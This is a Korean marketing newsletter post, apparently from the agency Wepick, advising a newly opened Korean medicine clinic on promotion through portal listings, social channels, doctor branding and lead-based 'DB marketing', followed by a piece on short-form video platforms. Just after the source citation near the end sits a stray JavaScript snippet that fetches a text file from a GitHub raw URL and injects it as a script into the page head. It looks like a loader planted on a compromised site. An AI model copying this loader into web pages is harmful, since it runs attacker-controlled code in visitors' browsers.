초기 병원 홍보가 막막하다면, 이 루트를 따라 걸어봐요!

일단 한 스텝씩, 체계적으로 나아가봐요.
위픽코퍼레이션
2022-07-06

안녕하세요!

두 달 전, 서울 외곽에 한의원을 개원한 한의사이자 병원을 책임지는 J 원장입니다. 두 달 동안 많은 동네분들이 한의원을 찾아주시기는 했지만, 아직 환자 수 자체는 부족한 실정입니다. 아무래도 동네를 넘어서, 다른 지역에서도 찾아오실 수 있도록 홍보를 해야 할 것 같아요. 개원하고 초반은 신경 쓸 부분이 너무 많아서, 흔히 말하는 기본적인 마케팅을 해놓지 못한 상태입니다.

동료 한의사들은 동네 블로그나 카페 관리가 그렇게 중요하다고 말해주는데, 어느 정도의 예산과 시간을 투자해서 비중을 두어야 하는지, 다른 지역 고객 유치를 위해서는 어떤 부분들을 고려해야 하는지 고민이 많습니다.

위픽레터 고민 보내기 추천 받고, 고민하다가 보내봅니다! 감사합니다!

안녕하세요 J원장님! 위픽레터 12호로 고민 답변 보내드립니다 ?

개원 초기라 여러가지 고민이 많으실 것 같아요. 사실 최근에는 고객들이 병원을 알아보고 선택할 때, 포털사이트에 병원의 정보를 검색하거나 후기를 찾아보는 일이 잦아지고 있어요. 아무리 동네이고 가깝다고 해도 병원 내부 사진이나, 의료진 정보들을 알고 가려고 하는 고객층도 늘어나고 있구요. 인터넷으로 몇 번의 검색을 통해, 고객이 원하는 병원 정보나 후기가 제공되지 않는다면 인근의 다른 병원을 검색하기가 쉽죠. ?

우리 병원의 장점을 다양한 고객들과 환자분들에게 알리기 위해서는, 어느정도 공격적인 마케팅이 필요한 시점이라고 봐요. 그 시기도 빠르면 빠를 수록 좋구요.

이제 병원을 알리는 방법에는 다양한 , 가장 기본적이지만 그만큼 강력한 방법들을

차례로 소개해 드릴게요! ?

(1) 주요 포털 사이트에 정확한 병원정보 기재하기

네이버 플레이스, 카카오 맵, 구글 마이비즈니스 등 수요가 높은 포털 사이트에 병원에 대한 정확한 정보를 기재하는 것은 중요해요. 병원을 마케팅하기 위한 기본 중에 기본이에요. 전화번호, 위치, 영업시간, 휴일, 점심시간 등 기본적인 정보를 포털사이트에 기재해 주세요.

내비게이션 업체에도 병원의 정확한 주소를 기재하면 좋겠죠?

(2) 병원 자체 SNS 채널 생성하기

주요 포털사이트에 병원 정보를 기재하는 것만큼이나, 병원 자체 SNS 채널들을 생성하고 관리하는 것도 중요합니다. 갑작스럽게 수정된 병원 일정이나 이벤트 소식 등 다양한 포스트들을 빠르게 업로드할 수 있어요. 꾸준히 관리하면, 포털 상위에 위치해서 유입률을 높일 수도 있고요. 이미 SNS 계정을 가지고 있는 고객이라면, 더 빠르고 편리하게 병원에서 발행하는 포스트들을 확인할 거예요!

또한 병원 자체 SNS 개설을 통해, 고객 & 환자와 소통할 수 있는 또 하나의 창구가 생긴다는 장점도 있습니다. ?

(3) 담당 의료진 브랜딩 하기

병원을 개원할 때, 원장님의 성함을 따서 병원명으로 정하는 경우가 많은 만큼 고객들은 대표 의료진의 이미지를 고려해서 병원을 선택합니다. 병원에서 제공하는 서비스나 시설도 중요하지만, 실질적으로 진료를 받을 때 받았던 의료진의 이미지로 병원 전체의 느낌을 단정 짓죠. 다른 경쟁 병의원과 차별화되는 이미지를 형성하기 위해서, 담당 의료진만의 철학이나 스토리를 자연스럽게 녹여내는 것도 하나의 마케팅 방법이 될 수 있습니다. ?

병원 자체 SNS 등을 개설했다면 채널들을 이용해서 대표 의료진들과의 인터뷰나 지켜야 할 간단한 의료 상식 등을 담은 콘텐츠들을 업로드해도 좋아요. 혹시 언론사나 잡지사와 나눴던 보도자료들이 남아있다면 업로드해도 좋고요. 온라인에 남겨진 병원 후기나, 의료진 후기를 꾸준히 모니터링하는 것도 병원의 좋은 이미지를 구축하는데 필요합니다.

유튜브를 통해 각 분야에 맞춘 간단한 의료 상식 소개나 Q&A 형식의 질의응답 콘텐츠를 일반적으로 찾아볼 수 있습니다.

출처 : 안과의사 김무연 유튜브

블로그에는 다양한 병원 소식, 의료진 소개와 더불어 건강한 의료 정보와 상식들을 주기적으로 업로드하고 있습니다.

출처 : 수원 이춘택 병원 블로그

(4) 더 확실한 성과가 필요하다면 DB마케팅, 광고대행사 연락하기

기본적인 방법들은 다 시도했다. 하지만!

더 많은 고객들의 내원 & 타지역의 고객의 내원까지 희망하시는 병원이라면 전문적인 대행사와 컨택 후, 최적화된 DB마케팅 전략을 세우는 것도 좋은 방법입니다.

 DB마케팅이란?

온라인 노출 광고를 통해 ‘관심 있어 하는’ 진성 고객의 정보(이름, 나이, 연락처)를 수집한 다음, 전화 영업으로 보다 적극적으로 고객 유치에 힘쓰는 마케팅을 ‘DB 마케팅’ 또는 ‘CPA 마케팅’이라고 합니다.

영상, 카드뉴스, 단일 이미지 등 광고 소재를 먼저 제작한 후, 잠재 고객의 클릭을 유도하여 고객 정보를 입력할 수 있는 랜딩 페이지에 정보를 남기는 방법이죠. 타깃을 무작위로 선정하는 것이 아니라, 실제 관심을 보이는 잠재고객들의 DB를 확보했기 때문에 조금 더 공격적인 마케팅이 가능합니다.

(5) DB마케팅 업체 비교하는 법

전문적인 대행사들을 컨택해서 조금 더 최적화된 마케팅 전략을 세우기로 결심하셨다면, 가장 적합한 DB 마케팅 업체를 선정해야 합니다.

우리 병원에 직접적인 매출 효과를 가져다줄 수 있는 마케팅 업체를 꼼꼼하게 비교해보고 선정해야겠죠?

1) 병의원 마케팅 경력이 많거나, 병의원 마케팅 커리큘럼이 갖춰진 업체

여러 종류의 광고 상품이나 DB 마케팅 상품을 가지고 있는 대행사보다는 병의원을 집중적으로 마케팅할 수 있도록 자체적인 커리큘럼이 짜여진 업체를 선정하는 것이 중요합니다.

2) 단가를 투명하게 공개하고, 정확한 결과를 즉각적으로 제시하는 업체

DB마케팅은 무엇보다 즉각적인 대처와 상담이 실질적인 매출로 이어지기 때문에, 실시간으로 DB를 열람할 수 있는 서비스를 갖춘 업체를 선정해야 합니다.

3) 고객들의 신뢰도가 높은 업체

허위정보나 과장정보를 전달하지 않고, 제품의 장점을 자연스럽게 부각하는 업체일수록 고객의 신뢰감을 얻을 수 있습니다. 혹은 출처를 알 수 없는 일회성 페이지가 아닌, 다양한 병원들을 모아둔 플랫폼을 보유한 업체를 선정하는 방법도 효과적입니다.

181,622개(누적) 이상의 병의원 DB를 수집하고 있는 병의원 전문 마케팅 기업

‘위픽’에서 최적화된 병원 마케팅을 만나보세요.

숏폼콘텐츠

빠름, 빠름, 빠름을 외치던 LTE의 민족답게 이제는 콘텐츠도 짧고 강렬해지고 있어요. 기존의 드라마나 예능 프로그램들이 5~10분을 기준으로 편집되어 새로운 콘텐츠로 등장하고 있고, 애초에 짧게 기획된 영상들도 다양한 채널에서 쏟아지고 있어요.

이제, ‘숏폼(short-form contents) 콘텐츠’는 재미를 넘어서 하나의 주류 콘텐츠 시장으로 자리매김하고 있습니다. 

MZ세대들은 TV화면이나 컴퓨터 모니터를 통해서 콘텐츠를 즐기기 보다는, 비교적 작은 스마트폰으로 언제 어디서나 다양한 매체들을 즐깁니다. 마치 친구와 연락을 하는 것처럼, 간단한 정보를 받는 것처럼 손쉽고 재빠르게 콘텐츠를 확인하죠.

다양한 채널들 중 대표적인 숏폼 매체- 3가지를 소개할게요!

(1) 유튜브 쇼츠

최근 유튜브 인기 동영상에서 #Shorts라는 해시태그가 붙은 다양한 영상들을 확인할 수 있습니다. 60초 이내의 세로 비율 영상을 업로드할 수 있는 쇼츠는, 최근 유튜버들에게 ‘조회수 치트키’로 불리며 사랑받고 있어요.  ?

(2) 틱톡

틱톡의 대표적인 콘텐츠는 ‘#챌린지’에요. 짧은 노래 구절이나 랩 구절에 맞춰서 다양한 표정연기를 하거나, 춤을 춰요. 꼭 노래와 춤이 아니더라도 먹방이나 반려동물 자랑 등 다양한 카테고리가 존재합니다. ?

(3) 릴스

릴스는 30초 이내에 짧은 영상 형식으로, 직접 영상을 찍고 편집한 후에 원하는 음악을 추가해서 하나의 콘텐츠를 만들어요. 인스타 스토리처럼 쉽게 공유할 수도 있고요.

릴스 탭은 게시글 탭과 따로 존재해서, 릴스만 따로 보기에도 용이하답니다! 

[출처 : https://wepick.kr/letters/4305358/]

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)
위픽코퍼레이션의 글 더보기
Elementor #4352262
? 디자인 맛집으로 소문난 이 곳!
애니메이션에 녹아 든 '아시아나 항공'의 맥주 마케팅
무아인, 버추얼 인플루언서의 등장?
'대한민국'을 응원하는 '박카스'의 한마디
세상에서 가장 조용한 CM송, 해태 부라보콘 광고 털기?
브랜딩 더보기
? 디자인 맛집으로 소문난 이 곳!
중소기업 바우처 듣기는 많이 들었는데, 어떻게 활용할 수 있을까요?
? 타겟팅할 때 3가지만 기억하세요!
브랜딩 공사, 기초부터 차근차근 다지는 법
우리는 굿즈가 아니라 ‘브랜드’를 판다!
MZ세대 취향저격 성공한 브랜드들의 공통점이 궁금하다면?

4335184 인기 이벤트

댓글

링크복사

페이스북

카카오톡